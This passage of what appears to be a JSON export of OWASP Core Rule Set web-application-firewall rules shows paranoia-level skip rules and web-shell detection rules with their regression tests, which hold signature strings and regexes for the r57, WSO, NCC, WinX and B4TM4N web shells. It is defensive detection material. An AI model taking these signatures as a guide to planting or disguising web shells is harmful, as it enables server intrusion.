"tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 261, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "3", "actions": [ { "act_name": "id", "lineno": 261, "act_quote": "no_quote", "act_arg": "959015", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 261, "act_quote": "no_quote", "act_arg": "3", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 261, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 261, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 261, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 261, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 261, "act_quote": "no_quote", "act_arg": "END-RESPONSE-959-BLOCKING-EVALUATION", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 261 } }, { "rule_id": "959016", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "3", "negated": false } }, "transformations": [], "metadata": { "phase": "4", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 262, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "3", "actions": [ { "act_name": "id", "lineno": 262, "act_quote": "no_quote", "act_arg": "959016", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 262, "act_quote": "no_quote", "act_arg": "4", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 262, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 262, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 262, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 262, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 262, "act_quote": "no_quote", "act_arg": "END-RESPONSE-959-BLOCKING-EVALUATION", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 262 } }, { "rule_id": "959017", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "4", "negated": false } }, "transformations": [], "metadata": { "phase": "3", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 269, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "4", "actions": [ { "act_name": "id", "lineno": 269, "act_quote": "no_quote", "act_arg": "959017", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 269, "act_quote": "no_quote", "act_arg": "3", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 269, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 269, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 269, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 269, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 269, "act_quote": "no_quote", "act_arg": "END-RESPONSE-959-BLOCKING-EVALUATION", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 269 } }, { "rule_id": "959018", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "4", "negated": false } }, "transformations": [], "metadata": { "phase": "4", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 270, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "4", "actions": [ { "act_name": "id", "lineno": 270, "act_quote": "no_quote", "act_arg": "959018", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 270, "act_quote": "no_quote", "act_arg": "4", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 270, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 270, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 270, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 270, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 270, "act_quote": "no_quote", "act_arg": "END-RESPONSE-959-BLOCKING-EVALUATION", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 270 } }, { "rule_id": "955010", "has_tests": false, "detection": { "variables": [ { "name": "RESPONSE_HEADERS", "part": "Content-Encoding", "negated": false } ], "operator": { "type": "@pm", "argument": "gzip compress deflate br zstd", "negated": false } }, "transformations": [], "metadata": { "phase": "4", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS", "OWASP_CRS/WEB-SHELLS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 16, "variables": [ { "variable": "RESPONSE_HEADERS", "variable_part": "Content-Encoding", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@pm", "operator_argument": "gzip compress deflate br zstd", "actions": [ { "act_name": "id", "lineno": 17, "act_quote": "no_quote", "act_arg": "955010", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 18, "act_quote": "no_quote", "act_arg": "4", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 19, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 20, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 21, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 22, "act_quote": "quotes", "act_arg": "OWASP_CRS/WEB-SHELLS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 23, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 24, "act_quote": "no_quote", "act_arg": "END-RESPONSE-955-WEB-SHELLS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 16 } }, { "rule_id": "955011", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "1", "negated": false } }, "transformations": [], "metadata": { "phase": "3", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 26, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "1", "actions": [ { "act_name": "id", "lineno": 26, "act_quote": "no_quote", "act_arg": "955011", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 26, "act_quote": "no_quote", "act_arg": "3", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 26, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 26, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 26, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 26, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 26, "act_quote": "no_quote", "act_arg": "END-RESPONSE-955-WEB-SHELLS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 26 } }, { "rule_id": "955012", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "1", "negated": false } }, "transformations": [], "metadata": { "phase": "4", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 27, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "1", "actions": [ { "act_name": "id", "lineno": 27, "act_quote": "no_quote", "act_arg": "955012", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 27, "act_quote": "no_quote", "act_arg": "4", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 27, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 27, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 27, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 27, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 27, "act_quote": "no_quote", "act_arg": "END-RESPONSE-955-WEB-SHELLS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 27 } }, { "rule_id": "955100", "has_tests": true, "detection": { "variables": [ { "name": "RESPONSE_BODY", "part": "", "negated": false } ], "operator": { "type": "@pmFromFile", "argument": "web-shells-php.data", "negated": false } }, "transformations": [ "none" ], "metadata": { "phase": "4", "message": "PHP Web shell detected", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-rce" ], "severity": "CRITICAL", "tags": [ "language-php", "platform-multi", "attack-rce", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/WEB-SHELLS", "capec/1000/225/122/17/650" ] }, "test_cases": [ { "description": "Matching web shell NCC Shell", "test_id": 1, "request": { "method": "POST", "uri": "/reflect", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Language": "en-us,en;q=0.5", "Content-Type": "application/json" }, "data": "{\"body\": \"

.:NCC:. Shell v\"}" }, "expected": { "should_block": true, "rule_ids": [ 955100 ] }, "malicious_patterns": [ { "location": "post_body", "value": "{\"body\": \"

.:NCC:. Shell v\"}" } ] }, { "description": "Matching web shell Simple PHP backdoor", "test_id": 2, "request": { "method": "POST", "uri": "/reflect", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Language": "en-us,en;q=0.5", "Content-Type": "application/json" }, "data": "{\"body\": \"\"}" }, "expected": { "should_block": true, "rule_ids": [ 955100 ] }, "malicious_patterns": [ { "location": "post_body", "value": "{\"body\": \"\"}" } ] }, { "description": "Matching web shell WinX Shell", "test_id": 3, "request": { "method": "POST", "uri": "/reflect", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Language": "en-us,en;q=0.5", "Content-Type": "application/json" }, "data": "{\"body\": \"-:[GreenwooD]:- WinX Shell\"}" }, "expected": { "should_block": true, "rule_ids": [ 955100 ] }, "malicious_patterns": [ { "location": "post_body", "value": "{\"body\": \"-:[GreenwooD]:- WinX Shell\"}" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 34, "variables": [ { "variable": "RESPONSE_BODY", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@pmFromFile", "operator_argument": "web-shells-php.data", "actions": [ { "act_name": "id", "lineno": 35, "act_quote": "no_quote", "act_arg": "955100", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 36, "act_quote": "no_quote", "act_arg": "4", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 37, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 38, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 39, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 40, "act_quote": "quotes", "act_arg": "PHP Web shell detected", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 41, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 42, "act_quote": "quotes", "act_arg": "language-php", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 43, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 44, "act_quote": "quotes", "act_arg": "attack-rce", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 45, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 46, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 47, "act_quote": "quotes", "act_arg": "OWASP_CRS/WEB-SHELLS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 48, "act_quote": "quotes", "act_arg": "capec/1000/225/122/17/650", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 49, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 50, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 51, "act_quote": "quotes", "act_arg": "tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 34 } }, { "rule_id": "955110", "has_tests": true, "detection": { "variables": [ { "name": "RESPONSE_BODY", "part": "", "negated": false } ], "operator": { "type": "@rx", "argument": "r57 Shell Version [0-9.]+|r57 shell", "negated": false } }, "transformations": [ "none" ], "metadata": { "phase": "4", "message": "r57 web shell", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-rce" ], "severity": "CRITICAL", "tags": [ "language-php", "platform-multi", "attack-rce", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/WEB-SHELLS", "capec/1000/225/122/17/650" ] }, "test_cases": [ { "description": "R57 Webshell Test as per https://github.com/r57shell/r57-shell/blob/e85aeeea421b76777e95ae00ae57bba79d5d9389/r57.php#L38", "test_id": 1, "request": { "method": "POST", "uri": "/reflect", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Content-Type": "application/json" }, "data": "{\"body\": \"r57 Shell Version 1.50\"}" }, "expected": { "should_block": true, "rule_ids": [ 955110 ] }, "malicious_patterns": [ { "location": "post_body", "value": "{\"body\": \"r57 Shell Version 1.50\"}" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 54, "variables": [ { "variable": "RESPONSE_BODY", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "r57 Shell Version [0-9.]+|r57 shell", "actions": [ { "act_name": "id", "lineno": 55, "act_quote": "no_quote", "act_arg": "955110", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 56, "act_quote": "no_quote", "act_arg": "4", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 57, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 58, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 59, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 60, "act_quote": "quotes", "act_arg": "r57 web shell", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 61, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 62, "act_quote": "quotes", "act_arg": "language-php", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 63, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 64, "act_quote": "quotes", "act_arg": "attack-rce", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 65, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 66, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 67, "act_quote": "quotes", "act_arg": "OWASP_CRS/WEB-SHELLS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 68, "act_quote": "quotes", "act_arg": "capec/1000/225/122/17/650", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 69, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 70, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 71, "act_quote": "quotes", "act_arg": "tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 54 } }, { "rule_id": "955120", "has_tests": true, "detection": { "variables": [ { "name": "RESPONSE_BODY", "part": "", "negated": false } ], "operator": { "type": "@rx", "argument": "^.*?(?: -)? W[Ss][Oo] [0-9.]+", "negated": false } }, "transformations": [ "none" ], "metadata": { "phase": "4", "message": "WSO web shell", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-rce" ], "severity": "CRITICAL", "tags": [ "language-php", "platform-multi", "attack-rce", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/WEB-SHELLS", "capec/1000/225/122/17/650" ] }, "test_cases": [ { "description": "Matching web shell NCC Shell", "test_id": 1, "request": { "method": "POST", "uri": "/reflect", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Language": "en-us,en;q=0.5", "Content-Type": "application/json" }, "data": "{\"body\": \"example.com - WSO 4.2.6\"}" }, "expected": { "should_block": true, "rule_ids": [ 955120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "{\"body\": \"example.com - WSO 4.2.6\"}" } ] }, { "description": "Matching web shell Simple PHP backdoor", "test_id": 2, "request": { "method": "POST", "uri": "/reflect", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Language": "en-us,en;q=0.5", "Content-Type": "application/json" }, "data": "{\"body\": \"example.com Wso 2024\"}" }, "expected": { "should_block": true, "rule_ids": [ 955120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "{\"body\": \"example.com Wso 2024\"}" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 74, "variables": [ { "variable": "RESPONSE_BODY", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "^.*?(?: -)? W[Ss][Oo] [0-9.]+", "actions": [ { "act_name": "id", "lineno": 75, "act_quote": "no_quote", "act_arg": "955120", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 76, "act_quote": "no_quote", "act_arg": "4", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 77, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 78, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 79, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 80, "act_quote": "quotes", "act_arg": "WSO web shell", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 81, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 82, "act_quote": "quotes", "act_arg": "language-php", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 83, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 84, "act_quote": "quotes", "act_arg": "attack-rce", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 85, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 86, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 87, "act_quote": "quotes", "act_arg": "OWASP_CRS/WEB-SHELLS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 88, "act_quote": "quotes", "act_arg": "capec/1000/225/122/17/650", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 89, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 90, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 91, "act_quote": "quotes", "act_arg": "tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 74 } }, { "rule_id": "955130", "has_tests": false, "detection": { "variables": [ { "name": "RESPONSE_BODY", "part": "", "negated": false } ], "operator": { "type": "@rx", "argument": "B4TM4N SH3LL[^<]*", "negated": false } }, "transformations": [ "none" ], "metadata": { "phase": "4", "message": "b4tm4n web shell", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-rce" ], "severity": "CRITICAL", "tags": [ "language-php", "platform-multi", "attack-rce", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/WEB-SHELLS", "capec/1000/225/122/17/650" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 94, "variables": [ { "variable": "RESPONSE_BODY", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "B4TM4N SH3LL[^<]*", "actions": [ { "act_name": "id", "lineno": 95, "act_quote": "no_quote", "act_arg": "955130", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 96, "act_quote": "no_quote", "act_arg": "4", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 97, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 98, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 99, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 100, "act_quote": "quotes", "act_arg": "b4tm4n web shell", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 101, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 102, "act_quote": "quotes", "act_arg": "language-php", 